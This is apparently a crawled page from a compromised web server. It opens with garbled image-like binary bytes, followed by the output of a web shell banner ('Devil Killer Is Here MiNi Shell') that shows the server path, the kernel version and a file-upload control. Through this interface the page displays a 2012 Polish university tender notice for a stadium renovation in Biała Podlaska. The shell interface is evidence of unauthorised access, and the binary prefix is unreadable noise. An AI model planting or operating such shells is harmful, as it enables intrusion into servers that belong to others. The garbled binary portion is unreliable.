JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121008/214093-N-2012.html

<p class="kh_header"><b>Biała Podlaska: Modernizacja (remont) stadionu lekkoatletycznego</b><br>
<b>Numer ogłoszenia: 214093 - 2012; data zamieszczenia: 08.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Wychowania Fizycznego J. Piłsudskiego 00-968 Warszawa, ul. Marymoncka 34, Wydział Wychowania  Fizycznego i Sportu , ul. Akademicka 2, 21-500 Biała Podlaska, woj. lubelskie, tel. 83 3428712, faks 83 3428712.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.awf-bp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja (remont) stadionu lekkoatletycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie dokumentacji projektowej wykonawczej wraz z wykonaniem na jej podstawie robót budowlanych polegających na modernizacji (remoncie) stadionu w części lekkoatletycznej (w tym dostosowanie do wymagań PZLA dla stadionów kat IIIA) i w części gier zespołowych do celów sportowo - rekreacyjnych, badań naukowych, zawodów sportowych na potrzeby Regionalnego Ośrodka Badań i Rozwoju w szczególności Laboratorium Kompleksowej Diagnostyki Układu Ruchu i Wydolności Fizycznej Człowieka oraz Wydziału Wychowania Fizycznego i Sportu w Białej Podlaskiej. 2. Zakres rzeczowy przedmiotu zamówienia obejmuje wykonanie dokumentacji projektowej wykonawczej wraz z wykonaniem na jej podstawie robót budowlanych polegających na m.in.:
W części lekkoatletycznej stadionu  1) częściowej wymianie podbudowy istniejącej bieżni lekkoatletycznej o nawierzchni poliureta-nowej - podbudowa asfaltowo - betonowa (Przyjęto 20% powierzchni. Roboty wykonać na podstawie własnej opinii technicznej lub ekspertyzy, opracowanej przez Wykonawcę, w uzgodnieniu zakresu prac z Zamawiającym); 2) wymianie nawierzchni poliuretanowej na istniejącej podbudowie asfaltowo- betonowej - na całej bieżni i zakolach - ok. 7 323 m2. Roboty obejmują również wykonanie linii, znaków i numeracji torów zgodnie z przepisami,; 3) wykonaniu stanowisk pomiarowych do badań i montaż aparatury badawczej, dostarczonej przez Zamawiającego (platformy tensonometrycznej); 4)	wymianie siedzisk z tworzyw sztucznych, nieskładanych, elementy metalowe ocynkowane  - 1978 szt.; 5)	wymianie betonowych słupów oświetleniowych (13 szt.) trybun (lub rozwiązanie alternatywne); 6)	montażu instalacji nawadniającej oraz zraszaczy przekładniowych dużego zasięgu (15 szt.); 7) zakupie i montażu oraz uruchomieniu tablicy wyników wraz z wykonaniem konstrukcji wsporczej, 8) wykonaniu i uruchomieniu kompletnej instalacji CCTV; 9) modernizacji stanowisk (2 szt.) do skoku w dal, 10) modernizacji stanowisk i zakupie zestawu do skoku o tyczce, 11)	innych robotach takich jak: a) odsunięcie barierek od bieżni - demontaż istniejących barierek oraz ponowny montaż w odległości 1,0 m od strony zewnętrznej bieżni, malowanie barierek farbami poliwinylowymi lub chlorokauczukowymi; b)	malowanie konstrukcji stalowej zadaszenia trybuny od strony kortów tenisowych; c) wymiana kołnierza wraz z włazem studzienki żeliwnej typ A-15, śr. 600 mm; d)	montaż rur spustowych z tworzyw sztucznych O 10 cm, l=6,50 m w osłonie z blach stalowych grub. 2 mm (w części pionowej), spawanych do słupów stalowych konstrukcji zada-szenia  l=3,50 m - 11 szt, malowanie osłon z blach stalowych farbami poliwinylowymi lub chlorokauczukowymi, montaż rewizji przy rurach spustowych; e) uszczelnienie istniejącego zadaszenia z blachy stalowej ocynkowanej T-55 - 70 msc.; f) rozebranie chodnika z kostki betonowej - ok. 250,0 m2, wraz z obrzeżami - 105,00 m., wykonanie wykopu oraz ułożenie rur PCV O200 do kanalizacji deszczowej - ok. 150,00 m, wykonanie wykopu i ułożenie rur PCV O250 do kanalizacji deszczowej w obrębie boisk LA w części trawiastej - 100 mb do istniejącej kanalizacji deszczowej, podłączenie rur spustowych, zasypanie i zagęszczenie wykopu, ponowne ułożenie chodnika z kostki betonowej - ok. 250,0 m2; g)	oczyszczenie powierzchni, osuszenie, wyrównanie zaprawą cementową i wykonanie izolacji pionowej murów oporowych przy kortach tenisowych - 2xIzohan Izobud WL - ok. 150,00 m2 + folia kubełkowa; h)	miejscowe naprawy konstrukcji trybun z użyciem zapraw specjalistycznych do napraw konstrukcji betonowych; i) wykonanie powłok systemowych poliuretanowych lub epoksydowych; j)	wywiezienie oraz utylizacja nawierzchni, siedzisk, gruzu i innych materiałów z rozbiórki, W części stadionu przeznaczonej do gier zespołowych 12) robotach rozbiórkowych i przygotowawczych (demontaż bramek, koszy itp.); 13)	naprawie istniejącej podbudowy poprzez frezowanie i wykonanie nadlewki z asfaltobetonu - ok. 1 886 m2; 14)	poszerzeniu boiska z wykonaniem podbudowy - ok. 35 m2; 15) wykonaniu krawężnika z obrzeży trawnikowych grub. 8 cm - ok. 100 m; 16) wykonaniu nawierzchni poliuretanowej - ok. 1 886 m2; 17)	wymianie istniejących słupów oświetleniowych (6 szt.) oraz istniejących linii kablowych prowadzonych w ziemi do słupów oświetleniowych;
18)	zakupie i montażu zestawów do piłki koszykowej (3 kpl.) oraz do piłki ręcznej (1 kpl.); 3. W/w roboty należy zaprojektować oraz wykonać zgodnie z zasadami wiedzy technicznej, warunkami technicznymi wykonania i odbioru robót budowlanych oraz (dotyczy stadionu LA) wytycznymi PZLA Założenia dla projektantów stadionów LA z 20 maja 2010 r. 4. Zamawiający wymaga, aby dokumentacja projektowa została sporządzona na podstawie Programu Funkcjonalno - Użytkowego, obmiarów, ekspertyz i analiz dokonanych na obiektach Zamawiającego przez Wykonawcę, z uwzględnieniem wymagań Polskiego Związku Lekkiej Atletyki Komisji Obiektów i Urządzeń zawartych w publikacji Założenia dla projektantów stadionów LA oraz przewidywanych badań naukowych. 5. Zamawiający zastrzega sobie możliwość ograniczenia umownego zakresu przedmiotu zamówienia na warunkach określonych w ogólnych warunkach umowy, stanowiących załącznik nr 9 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.24-2, 71.00.00.00-8, 45.10.00.00-8, 45.22.32.00-8, 45.23.32.00-1, 31.00.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga zabezpieczenia złożonej oferty wadium w wysokości 60 000, 00 PLN (słownie złotych: sześćdziesiąt tysięcy, 00/100). Termin wnoszenia wadium upływa wraz z terminem i godziną przewidzianą na składanie ofert. 2. Wadium może być wniesione w jednej lub kilku z następujących form: 1) pieniężnej; 2) poręczeniach bankowych; 3) poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że jest ono zawsze po-ręczeniem pieniężnym; 4) gwarancjach bankowych; 5) gwarancjach ubezpieczeniowych; 6) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza (nie precyzuje) szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeśli Wykonawca wykaże, nie później niż na dzień składania ofert, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, co najmniej 1 (jedną) robotę budowlaną, polegającą na budowie, remoncie, rozbudowie bieżni lekkoatletycznych o sztucznej nawierzchni o długości minimum 400 metrów, popartą dokumentami potwierdzającymi, że roboty zostały wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza (nie precyzuje) szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeśli Wykonawca wykaże, nie później niż na dzień składania ofert, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia na stanowiskach:kierownika budowy posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej (lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów), kierownika robót budowlanych posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej (lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów), kierownika robót elektrycznych posiadającego uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów), kierownika robót sanitarnych posiadającego uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych (lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów), Zamawiający dopuszcza, wskazywanie tej samej osoby na więcej niż jedno w/w stanowisko, ale w takim przypadku osoba ta winna posiadać, wymagane kwalifikacje dla każdego ze stanowisk, na które jest wskazana</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza (nie precyzuje) szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">potwierdzające, że oferowana nawierzchnia sportowa poliuretanowa oraz nawierzchnia sportowa, dwuwarstwowa poliuretanowo-gumowa odpowiada wymaganiom określonym przez Zamawiającego w SIWZ: 1/ dla nawierzchni poliuretanowej: a) aktualną Aprobatę lub Rekomendację Techniczną ITB lub dokument równoważny wydany przez instytucję upoważnioną do badań nawierzchni Sportowych potwierdzającą wszystkie wymagane parametry nawierzchni,
b) badania potwierdzające zgodność proponowanej nawierzchni z wymaganiami IAAF, wydane przez jednostkę akredytowaną przez IAAF, c) badania potwierdzające bezpieczeństwo ekologiczne, wydane przez laboratorium posiadające akredytację;
d) aktualny certyfikat IAAF dla oferowanej nawierzchni o wymaganej grubości na bieżnię; e)	kartę techniczną zawierającą parametry oferowanej nawierzchni;
f) atest higieniczny; 2/ dla nawierzchni dwuwarstwowej poliuretanowo-gumowej:
a) aktualną Aprobatę lub Rekomendację Techniczną ITB (pełną), b) aktualne badania na zgodność z normą PN-EN 14877, c) sprawozdanie z wyników badań potwierdzających bezpieczeństwo ekologiczne na zgodność DIN V 18035-6 oferowanej syntetycznej nawierzchni sportowej, w tym zawartość substancji szkodliwych (między innymi metali ciężkich), wydane przez akredytowane laboratorium, d) atest PZH, e) kartę techniczną oferowanej syntetycznej nawierzchni sportowej, która zawiera parametry oferowanej nawierzchni,</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz oferty (wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy, złożony w/g wzoru stanowiącego załącznik nr 1 do SIWZ); 2) harmonogram rzeczowo - finansowy sporządzony w formie graficznej, przedstawiający zakres rzeczowy robót, jego realizację w podziale na trzy etapy oraz wartości brutto zakresu robót dla konkretnego etapu, wartość poszczególnych zakresów robót oraz ogółem wartość brutto przedmiotu zamówienia (wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy, złożony w/g wzoru stanowiącego załącznik nr 12 do SIWZ); 3) udział podwykonawców - w przypadku, gdy Wykonawca planuje wykonywanie zamówienia przy pomocy podwykonawców (złożony w/g wzoru stanowiącego załącznik nr 7 do SIWZ); 4) pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie niniejszego zamówienia, albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego, potwierdzające uprawnienie osoby lub osób podpisujących ofertę, o ile nie wynika ono z przepisów prawa lub innych dokumentów rejestracyjnych Wykonawcy, dołączonych do oferty - złożone w oryginale lub notarialnie poświadczonej kopii;
5) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo do reprezentowania Wykonawców w postępowaniu i zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego - złożone w oryginale lub notarialnie poświadczonej kopii, lub inny dokument ustanawiający pełnomocnika (np. umowa konsorcjum / spółki cywilnej, jeżeli zawiera w/w informacje), 6) pisemne zobowiązanie innych podmiotów, do oddania do dyspozycji Wykonawcy, niezbędnych do wykonania zamówienia zasobów (potencjału), na okres korzystania   z nich przy wykonywaniu niniejszego zamówienia na zasadach określonych w art. 26 ust. 2b ustawy Pzp - pisemne zobowiązanie może zastąpić np. umowa o podwykonawstwo, umowa przedwstępna, porozumienie, umowa o współdziałanie lub inny dokument, z którego będzie wynikać stosowne zobowiązanie podmiotu trzeciego do udostępnienia Wykonawcy własnego potencjału, tzn. z dokumentów tych powinno precyzyjnie wynikać, kto  komu przekazuje zasoby, jakie konkretnie zasoby zostaną przekazane i że zostaną udostępnione Wykonawcy na okres niezbędny do realizacji zamówienia (przykładową treść pisemnego zobowiązania przedstawia załącznik nr 8 do SIWZ) - dotyczy Wykonawców, którzy wykazując spełnianie warunków udziału w postępowaniu polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych, innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony zastrzegają możliwość zmiany zawartej umowy w stosunku do treści złożonej oferty, na podstawie, której dokonano wyboru Wykonawcy w zakresie warunków jej wykonania (z zastrzeżeniem, że zmiany te nie będą powodować wzrostu ceny), w sytuacji, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy lub, gdy zmiany te będą korzystne dla Zamawiającego, w szczególności z następujących powodów:
1) z powodu okoliczności siły wyższej - wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach; 2) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu umowy proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego; 3) wstrzymania robót z przyczyn niezależnych od Wykonawcy w związku z ewentualnymi postępowaniami sądowymi, przed organami administracji państwowej lub samorządowej oraz w razie konieczności dokonania rozstrzygnięć sporów na gruncie ustawy o prawie autorskim i prawach pokrewnych; 4) braku możliwości realizacji kolejnych zakresów robót ze względu na wystąpienie konieczności uprzedniej realizacji robót dodatkowych, bez których wykonanie zamówienia podstawowego jest utrudnione lub niemożliwe, albo połączone z niewspółmiernie wysokimi kosztami; 5) konieczności zmiany osób odpowiedzialnych za realizację niniejszej umowy, zarówno ze strony Zamawiającego jak i Wykonawcy, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje jak osoby wskazane w umowie; 6) konieczności zmiany podmiotu, na którego potencjale Wykonawca polegał składając ofertę, a który bierze udział w realizacji zamówienia pod warunkiem, że nowy podmiot wykaże spełnienie warunków udziału w postępowaniu w takim samym lub większym stopniu i zakresie, co podmiot wskazany w ofercie; 7) pojawienia się na rynku materiałów lub urządzeń nowszej generacji lub pojawienie się nowszej technologii wykonania robot, pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy i kosztów przyszłej eksploatacji, albo umożliwiających uzyskanie lepszej, jakości wykonanych robot bądź poprawę warunków bezpieczeństwa i eksploatacji w obiekcie; 8) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron; 9) gdy zaistnieje inna, trudna do przewidzenia okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania zamówienia zgodnie z zawartą umową, 3. Wystąpienie którejkolwiek z wymienionych okoliczności nie stanowi zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy roszczeń Wykonawcy o ich dokonanie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.awf-bp.edu.pl/zamowienia-publiczne.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WWFiS w Białej Podlaskiej ul. Akademicka 2 w pok. 128 w godz. 800 - 1600- w cenie 18, 00 zł.(słownie: osiemnaście złotych), jak również za zalicz. poczt. pokryw. koszty przesyłki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2012 godzina 10:00, miejsce: Wydział Wychowania Fizycznego i Sportu, 21-500 Biała Podlaska, ul. Akademicka 2 w pokoju nr 128 (Sekcja Zamówień Publicznych i Zaopatrzenia).</p>
